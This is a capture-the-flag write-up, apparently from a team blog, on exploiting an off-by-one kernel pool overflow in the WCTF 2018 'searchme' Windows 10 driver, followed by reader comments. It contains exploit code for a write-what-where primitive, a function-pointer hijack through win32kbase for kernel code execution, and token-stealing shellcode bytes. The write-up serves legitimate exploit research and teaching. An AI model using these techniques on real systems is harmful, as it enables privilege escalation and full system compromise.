Exploiting a Windows 10 PagedPool off-by-one overflow (WCTF 2018)

During the weekend of 6-8th of July, our CTF team – Dragon Sector – played in an invite-only competition called WCTF, held in Beijing. The other participants were top-tier groups from around the world (e.g. Shellphish, ESPR, LC↯BC or Tokyo Westerns), and the prize pool of the contest was a stunning $100,000 USD. One particularly unique rule of the CTF was that the challenges were prepared by the teams themselves and not the organizers. Each of the 10 teams was obligated to provide two tasks, at least one of which had to run on Windows. This meant that each team could capture a maximum of 18 flags set up by the other teams in the room. In practice, the structure of the contest incentivized submitting extremely difficult and complex challenges. Remote help was allowed, and the scoring system offered first blood bonus points for being the first, second and third team to solve a task. The hacking part of the event was followed by a soft part, where additional points were granted by a jury and the participants for presenting one’s own tasks on stage.

After two days of though competition, we came out as the runner up of the CTF with 6/18 tasks solved, behind the winner – Tokyo Westerns (7/18 tasks):

My contribution to the above result was a flag for the “Searchme” task authored by Eat, Sleep, Pwn, Repeat. It involved the exploitation of an off-by-one buffer overflow of a PagedPool allocation made by a vulnerable kernel driver loaded in Windows 10 64-bit. Shortly after the CTF, the original author (@_niklasb) published the source code of the driver and the corresponding exploit (see niklasb/elgoog on GitHub and discussion on Twitter), which revealed that my solution was partially unintended. Niklas used the off-by-one to corrupt allocation metadata and performed some pool feng-shui to get overlapping pool chunks. On the other hand, I achieved a similar outcome through a data-only attack without touching any pool metadata, which made the overall exploitation process somewhat simpler. I encourage you to closely analyze Niklas’ exploit, and if you’re interested in my approach, follow along.

If you want to jump straight to the exploit code, find it on GitHub.

Initial recon

As a part of the task, we were provided with a 64-bit Windows kernel driver called searchme.sys consuming 14 kB of disk space, and the following description:

<ip> 3389 flag is here: c:\flag.txt, User:ctf, password:ctf

When I connected to the remote host via RDP, I could log in as a regular “ctf” user. The searchme.sys driver was loaded in the system, and the desired C:\flag.txt file was found on disk, but it couldn’t be read from the security context of the current user, as expected:

Access denied to C:\flag.txt

At this point, it was quite clear that the goal of the challenge was to exploit a kernel-mode vulnerability in searchme.sys to elevate privileges to administrative or system rights, and then read the flag from the protected file. When I loaded the module in IDA Pro, I quickly learned that it registered a device under \Device\Searchme and handled four IOCTLs using the Buffered I/O communication scheme:

  • 0x222000 – allocates an empty object from PagedPool, saves it in a global array and returns its address to the caller,
  • 0x222004 – frees a previously allocated object,
  • 0x222008 – adds a pair of (char[16], uint32) to an existing object,
  • 0x22200C – transforms an existing object of type-0 to type-1 in a one-way, irreversible manner.

As IOCTLs #1 and #2 were trivial, the vulnerability had to lurk somewhere in the implementation of #3 or #4. I briefly reverse-engineered the entire code found in the driver (with the help of Redford and implr) to get a grasp of its functionality, rename symbols and fix data types. It was clear that the driver maintained a hash map associating textual strings with lists of numeric values, and that some type of binary data structure was involved in type-1 objects, but I still didn’t fully understand the underlying purpose of the code (it later turned out to be binary interpolative code). I didn’t observe any obvious vulnerabilities either, but I noticed two suspicious behaviors:

  1. In the handling of 0x222008, the driver wouldn’t allow duplicates within the list of integers associated with a string token. However, it only checked the newly added value against the one at the back of the list. For example, a [1,2,2] list wouldn’t be allowed due to the equal consecutive numbers, but [2,1,2] could be created just fine. This seemed especially odd considering that the list was sorted later on when being processed by another IOCTL, potentially nullifying the whole point of the duplicate detection.
  2. In nested functions called by the 0x22200C handler, the following code construct was found:
    if (*cur_buf > buf_end) {
      return 1;
    }

    Assuming that buf_end was the smallest address beyond the valid buffer, this could indicate an off-by-one error, as the comparison should otherwise use the >= operator.

Since following the leads discussed above could be time consuming, I decided to try an easier route and see if I could trigger any crashes through dumb fuzzing. This would allow me to start my analysis from a known bad state, instead of spending time on searching for memory corruption primitives in the first place.

Fuzzing the driver

In the context of fuzzing, it was convenient that the communication interface of the driver was limited to four simple operations. During the development stage, I created several wrapper functions around DeviceIoControl which were later reused in the actual exploit. The fuzzer was very simple in its core – it infinitely invoked one of the IOCTLs with random, but correctly formatted input arguments (token=["aa","bb"], value=[0..9]).

After enabling Special Pool for searchme.sys and starting the fuzzer, it only took a few seconds to see the following crash in WinDbg:

DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)
N bytes of memory was allocated and more than N bytes are being referenced.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: ffffd9009c68b000, memory referenced
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation
Arg3: fffff8026b482628, if non-zero, the address which referenced memory.
Arg4: 0000000000000000, (reserved)

[...]

TRAP_FRAME:  ffff820b43580360 -- (.trap 0xffff820b43580360)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=ffffd9009c68b000 rbx=0000000000000000 rcx=00000000fffffffe
rdx=0000000000000001 rsi=0000000000000000 rdi=0000000000000000
rip=fffff8026b482628 rsp=ffff820b435804f8 rbp=0000000000000000
 r8=ffffd9009c68b000  r9=0000000000000000 r10=00007ffffffeffff
r11=ffff820b435804f0 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
searchme+0x2628:
fffff802`6b482628 0fbe00          movsx   eax,byte ptr [rax] ds:ffffd900`9c68b000=??

The crash occurred at searchme+0x2628, which belongs to a bit-writing function – the same that contains the suspicious *cur_buf > buf_end comparison. Further analysis and experiments (e.g. fuzzing without Special Pool) confirmed that the overflow was indeed limited to a single byte.

At that moment, a light bulb went off in my head – I had already seen similar code not so long ago! After a quick check, it turned out to be true; the “searchme” task was in fact a slightly modified and recompiled version of elgoog2 from 34C3 a few months ago. The immediate benefit of the discovery was that the “elgoog” task came with debugging symbols, including structure definitions, function names and so on. After doing a bit more recon, I found this tweet, which lead to this short write-up and an exploit from shiki7 from Tea Deliverers. The unintended type confusion bug was patched in “searchme” so the old exploit no longer worked, but it still provided some valuable insight. Additionally, Niklas’ description of the pool buffer overflow in point (1) reinforced my belief that this was the intended bug to be exploited here.

And so, I spent the next hour or two moving the symbols from “elgoog” to my “searchme” IDA database.

Controlling the overflow

Upon looking into the series of commands sent by the fuzzer to trigger the crash, I learned that the overflow was indeed caused by “compressing” (IOCTL 0x22200C) an object containing a token with duplicate entries. Since I could only write one byte beyond the allocated buffer, it was likely that its value would need to be carefully controlled. Even with the help of debug symbols, I was still unsure what data structure was constructed by the code, and hence – how to precisely control its contents.

To avoid wasting time on an in-depth examination of the algorithm, I shamelessly copy-pasted the interpolative_size and write_interpolative functions (together with their dependencies) from the Hex-Rays decompiler to Visual Studio, and wrote a simple brute-force program around it, to test the overflow byte for various random input lists. The gist of the tool boils down to the following:

// Fill input_buffer with random numbers and sort it.

memset(output_buffer, 0xaa, sizeof(output_buffer));
char *buf = output_buffer;

write_interpolative(&buf, input_buffer, 1, ARRAYSIZE(input_buffer) - 1);

size_t calculated = (interpolative_size(input_buffer, 1, ARRAYSIZE(input_buffer) - 1) + 7) / 8;
ptrdiff_t written = buf - output_buffer - 1;

if (written > 0 && calculated > 0 && written > calculated) {
  const char kSearchedByte = 0;

  if (output_buffer[calculated] == kSearchedByte) {
    // Print input_buffer.
  }
}

Depending on the desired value, the length of input_buffer and the range of input numbers can be manipulated. For a simple value of 0x00, the desired effect can be achieved with just five numbers in the [0..9] range:

C:\> brute.exe
calculated: 4, written: 11, last byte: 0x00
input_buffer = {0, 1, 1, 1, 2}

calculated: 1, written: 4, last byte: 0x00
input_buffer = {0, 3, 4, 5, 5}

calculated: 1, written: 4, last byte: 0x00
input_buffer = {5, 7, 8, 9, 9}

[...]

With the ability to choose the single byte overflowing our allocation, it was time to lift the primitive to a more powerful one.

Data-only pool corruption

Most dynamic allocators used today place metadata in front of the allocated memory chunks, which has historically facilitated a number of generic heap exploitation techniques. On the other hand, it may currently make the exploitation of small overflows difficult, as metadata separates application-specific objects from each other, and it is often subject to extensive integrity checks. It is obligatory to make the following two references here: A Heap of Trouble: Breaking the Linux Kernel SLOB Allocator (Dan Rosenberg, 2012) and The poisoned NUL byte, 2014 edition (Chris Evans and Tavis Ormandy, 2014).

In his intended solution, Niklas also used pool metadata corruption to confuse the kernel pool allocator, and consequently have two distinct objects overlap with each other to achieve a more useful primitive. This is a valid approach, but it requires the exploit writer to be conscious of the inner workings of the allocator, and to precisely set up the pool layout to guarantee reliable exploitation. As a personal preference, I find it easier to attack program-specific objects than internal system structures, so I intuitively started looking for options to solve the challenge this way.

It may be a little known fact that in the Windows kernel, small allocations (fitting into a single memory page) are handled differently than large ones. For somewhat dated but still relevant details, see Kernel Pool Exploitation on Windows 7 (Tarjei Mandt, 2011) and Sheep Year Kernel Heap Fengshui: Spraying in the Big Kids’ Pool (Alex Ionescu, 2014). In this specific case, we are interested in two properties of large pool chunks:

  • Metadata is stored separately, so allocations start at page-aligned addresses such as 0xffffa803f5892000.
  • The chunks are often adjacent in memory; e.g. two consecutive allocations of size 0x1000 may be mapped to addresses 0xffffa803f5892000 and 0xffffa803f5893000, respectively.

In the vulnerable driver, we can accurately control the size of the overflown chunk up to a size of 0x10000 (16 pages). This is more than enough to allocate two large objects next to each other, and we can even determine the exact pairs of adjacent areas thanks to the fact that the IOCTLs explicitly return the kernel-mode addresses of the created objects. This was successfully confirmed by a simple tool I wrote during the CTF, which created eight 0x2000-byte long indexes and compared their addresses. The output was similar to the following:

C:\>adjacent.exe
[+] Source Index: ffffa803f2f79cb0
[1] Adjacent objects: ffffa803f61db000 --> ffffa803f61dd000
[2] Adjacent objects: ffffa803f61dd000 --> ffffa803f61df000
[3] Adjacent objects: ffffa803f61df000 --> ffffa803f61e1000
[4] Adjacent objects: ffffa803f61e1000 --> ffffa803f61e3000
[5] Adjacent objects: ffffa803f61e3000 --> ffffa803f61e5000
[6] Adjacent objects: ffffa803f61e5000 --> ffffa803f61e7000
[7] Adjacent objects: ffffa803f61e7000 --> ffffa803f61e9000

As you can see, all objects were in fact mapped next to each other in a continuous block of 0x10000 bytes. If we subsequently free every other object to create “holes” in the pool, and promptly allocate a new chunk of the same size that gets overflown by the driver, the overflow should overlap with the first byte of the adjacent index object. This is illustrated below:

Large pool chunk corruption scheme

At this point, we should look at the type of information stored in the first byte of the allocation. As it turns out, it is the least significant byte of a 32-bit integer indicating the type of the object (type 0 – regular, type 1 – compressed). The structure of the regular object is defined as shown below:

struct _inverted_index {
  /* +0x00 */ int compressed;
  /* +0x08 */ _ii_token_table *table;
};

If the compressed member is non-zero, the layout of the structure is quite different:

struct _compressed_index {
  /* +0x00 */ int compressed;
  /* +0x04 */ int size;
  /* +0x08 */ int offsets[size];
  /* +0x?? */ char data[...];
};

Thanks to the fact that the type of the object is either 0x00000000 or 0x00000001, our one-byte overflow enables us to change the type of the object from compressed_index to inverted_index. The type confusion has some handy primitives – in the structures above, we can see that the table pointer at offset 8 overlaps with the items of offsets[0] and offsets[1]. The values in the offsets array are offsets of compressed data relative to the compressed index, and thus they are relatively small. In our testing, they were equal to 0x558 and 0x56C, respectively.

When combined and interpreted as a 64-bit address, these two values form the following pointer: 0x0000056c00000558. It is not a typical address often observed in regular applications, but nevertheless it is a canonical user-mode address that can be mapped by the program using a simple VirtualAlloc call. In other words, the type confusion allows us to redirect a sensitive kernel-mode pointer to user space, and get complete control over the _ii_token_table structure used by the driver.

If we implement the discussed logic in a proof of concept program to change the type of an object from 1 to 0, and then try to add a new (keyword, value) pair to the corrupted index, we should observe the following system crash while searchme.sys tries to dereference memory from 0x0000056c00000558:

SYSTEM_SERVICE_EXCEPTION (3b)
An exception happened while executing a system service routine.
Arguments:
Arg1: 00000000c0000005, Exception code that caused the bugcheck
Arg2: fffff8008b981fea, Address of the instruction which caused the bugcheck
Arg3: ffff948fa7516c60, Address of the context record for the exception that caused the bugcheck
Arg4: 0000000000000000, zero.

[...]

CONTEXT:  ffff948fa7516c60 -- (.cxr 0xffff948fa7516c60)
rax=000000009b82a44c rbx=ffffcc8a26af7370 rcx=0000056c00000558
rdx=0000000000000000 rsi=ffffcc8a273fc20c rdi=ffff948fa75177d4
rip=fffff8008b981fea rsp=ffff948fa7517650 rbp=ffffcc8a2876fef0
 r8=0000000000000001  r9=0000000000000014 r10=0000000000000000
r11=0000000000000000 r12=ffffcc8a2876fef0 r13=ffffcc8a29470180
r14=0000000000000002 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
searchme+0x1fea:
fffff800`8b981fea 48f77108        div     rax,qword ptr [rcx+8] ds:002b:0000056c`00000560=????????????????

Let’s take a closer look at the capabilities provided by the controlled _ii_token_table structure.

Getting a write-what-where condition

Based on the elgoog symbol files, I recovered the prototypes of the _ii_token_table and related _ii_posting_list structures and wrote them down as the following C definitions:

struct _ii_posting_list {
  char token[16];
  unsigned __int64 size;
  unsigned __int64 capacity;
  unsigned int data[1];
};

struct _ii_token_table {
  unsigned __int64 size;
  unsigned __int64 capacity;
  _ii_posting_list *slots[1];
};

In many ways, the above data structure is similar to a std::map<string, std::vector<unsigned int>> construct in C++. When a program requests that a new (token, value) pair is added to the index, the code iterates through the slots array to find the posting list corresponding to the provided token, and once it’s found, the input value is appended to the list with the following expression:

PostingList.data[PostingList.size++] = value;

Considering that the token table is under our control, the _ii_posting_list.size field is 64-bit wide, and we know the base address of the fake posting list, this behavior is trivial to convert to an arbitrary write primitive. First, we declare the fake posting list in static memory with a known name (“fake”) and capacity equal to UINT64_MAX:

namespace globals {

_ii_posting_list PostingList = { "fake", 0, 0xFFFFFFFFFFFFFFFFLL };

}  // namespace globals

Then, we write a function to initialize the fake token table at the special 0x0000056c00000558 address:

BOOLEAN SetupWriteWhatWhere() {
  CONST PVOID kTablePointer = (PVOID)0x0000056c00000558;
  CONST PVOID kTableBase = (PVOID)0x0000056c00000000;

  if (VirtualAlloc(kTableBase, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE) == NULL) {
    printf("[-] Unable to allocate fake base.\n");
    return FALSE;
  }

  _ii_token_table *TokenTable = (_ii_token_table *)kTablePointer;
  TokenTable->size = 1;
  TokenTable->capacity = 1;
  TokenTable->slots[0] = &globals::PostingList;

  return TRUE;
}

Lastly, we add a helper function to trigger the 4-byte write-what-where condition:

VOID WriteWhatWhere4(ULONG_PTR CorruptedIndex, ULONG_PTR Where, DWORD What) {
  globals::PostingList.size = (Where - (ULONG_PTR)&globals::PostingList.data) / sizeof(DWORD);

  AddToIndex(CorruptedIndex, What, "fake");
}

With all this in place, we can test that it works:

WriteWhatWhere4(CorruptedIndex, 0x4141414141414141LL, 0x42424242);

which should trigger the following exception in the vulnerable driver:

CONTEXT:  ffff9609683dacb0 -- (.cxr 0xffff9609683dacb0)
rax=00007ff6a90b2930 rbx=ffffe48f8135b5a0 rcx=10503052a60d85fc
rdx=0000000042424242 rsi=ffffe48f82d7d70c rdi=ffff9609683db7d4
rip=fffff8038ccc1905 rsp=ffff9609683db6a0 rbp=ffffe48f82c79ef0
 r8=0000000000000001  r9=0000000000000014 r10=0000000000000000
r11=0000000000000000 r12=ffffe48f82c79ef0 r13=ffffe48f81382ac0
r14=0000000000000002 r15=0000000000000000
iopl=0         nv up ei pl nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
searchme+0x1905:
fffff803`8ccc1905 3954881c        cmp     dword ptr [rax+rcx*4+1Ch],edx ds:002b:41414141`4141413c=????????

The above crash log doesn’t fully illustrate the “write” operation due to some prior meaningless reads from PostingList.data, but the attack works.

Executing shellcode

At this point, I could write arbitrary kernel memory but not read it, which ruled out the option of data-only attacks performed directly from user-mode. However, with the write-what-where primitive in hand, executing ring-0 shellcode should be just a formality. In this case, it was made even easier thanks to the fact that the exploit was running at Medium integrity, so it had access to the base addresses of kernel modules, and could acquire other useful addresses through the various information classes of NtQuerySystemInformation.

In his Black Hat USA 2017 talk, Morten Schenk proposed that arbitrary write can be used to overwrite kernel function pointers residing in the .data section of win32kbase.sys, and more specifically in the win32kbase!gDxgkInterface table used by graphical syscalls from the NtGdiDdDDI* family. The system call handlers are in fact trivial wrappers around the function pointers, and conveniently don’t corrupt any of the arguments passed through the RCX, RDX, … registers, e.g.:

NtGdiDdDDICreateAllocation

This allows the attacker to invoke arbitrary kernel functions with controlled arguments, and receive the return values. As discussed by Morten, the complete exploitation process consists of just a few simple steps:

  1. Overwrite the function pointer with the address of nt!ExAllocatePoolWithTag.
  2. Call the routine with the NonPagedPool parameter to allocate writable/executable memory.
  3. Write the ring-0 shellcode to the allocated memory.
  4. Overwrite the function pointer with the address of the shellcode.
  5. Call the shellcode.

The above scheme makes it possible to cleanly execute the desired payload without corrupting the system state (except for the one overwritten pointer). In his paper, Morten suggested the use of NtGdiDdDDICreateAllocation as the proxy syscall, but I found that it was used in Windows sufficiently often that the system would start malfunctioning if the pointer was not promptly fixed up. To make my life a little bit easier, I chose a less frequently used service that seemed to be called exclusively by my exploit: NtGdiDdDDIGetContextSchedulingPriority.

After implementing the logic in code, I could enjoy arbitrary kernel code execution – in this example, a single int3 instruction:

kd> g
Break instruction exception - code 80000003 (first chance)
ffffc689`b8967000 cc              int     3

0: kd> u
ffffc689`b8967000 cc              int     3
ffffc689`b8967001 c3              ret
[...]

0: kd> !pool @rip
Pool page ffffc689b8967000 region is Nonpaged pool
*ffffc689b8967000 : large page allocation, tag is ...., size is 0x1000 bytes
		Owning component : Unknown (update pooltag.txt)

Elevating privileges

In Windows, one of the easier ways of elevating one’s privileges in the system is to “steal” the security token of a system process and copy it to the current process (specifically to EPROCESS.Token). An address of a system process can be found in the static memory of the ntoskrnl.exe image, under nt!PsInitialSystemProcess. As the attack only involves the copying of one pointer between two kernel structures, the shellcode only consists of six instructions:

  // The shellcode takes the address of a pointer to a process object in the kernel in the first
  // argument (RCX), and copies its security token to the current process.
  //
  // 00000000  65488B0425880100  mov rax, [gs:KPCR.Prcb.CurrentThread]
  // -00
  // 00000009  488B80B8000000    mov rax, [rax + ETHREAD.Tcb.ApcState.Process]
  // 00000010  488B09            mov rcx, [rcx]
  // 00000013  488B8958030000    mov rcx, [rcx + EPROCESS.Token]
  // 0000001A  48898858030000    mov [rax + EPROCESS.Token], rcx
  // 00000021  C3                ret
  CONST BYTE ShellcodeBytes[] = "\x65\x48\x8B\x04\x25\x88\x01\x00\x00\x48\x8B\x80\xB8\x00\x00\x00"
                                "\x48\x8B\x09\x48\x8B\x89\x58\x03\x00\x00\x48\x89\x88\x58\x03\x00"
                                "\x00\xC3";

Getting the flag

Once the security token of the exploit process is replaced, we have full control over the operating system. We can start an elevated command prompt and read the flag:

Successful exploitation of searchme.sys

In summary, after approximately 15 hours of work, the exploit was functional and netted us 120 points + 30 points of a first (and last) blood bonus. Thanks go to Niklas for creating this fun challenge and to WCTF organizers for running the competition. I think the task and its solution neatly illustrate that even today, theoretically minor bugs such as off-by-one overflows on the kernel pool may be conceptually simple to exploit, given the right set of circumstances. Buffer overflow exploitation in Windows is not dead just yet. :)

As a reminder, the full source code of the exploit is available on GitHub.

7 thoughts on “Exploiting a Windows 10 PagedPool off-by-one overflow (WCTF 2018)”

  1. Thanks for the nice exploit.
    Though it didn’t work for me. it gives me error:
    [+] ntoskrnl: b61900002880d000, win32kbase: 2714336946db63
    [-] Unable to open handle to vulnerable driver.

  2. Thank you, I enjoyed very much!

    “In this case, it was made even easier thanks to the fact that the exploit was running at Medium integrity, so it had access to the base addresses of kernel modules, and could acquire other useful addresses through the various information classes of NtQuerySystemInformation.”

    What if you didn’t have this?

  3. Thanks Paul! If I didn’t have this, I would probably try to use the addresses leaked by the vulnerable driver itself to find out where other nearby kernel pool allocations were, and overwrite one of them to construct a more convenient arbitrary read primitive. I would then use it to scan memory in search of the necessary ntoskrnl.exe and win32kbase.sys image bases.

Comments are closed.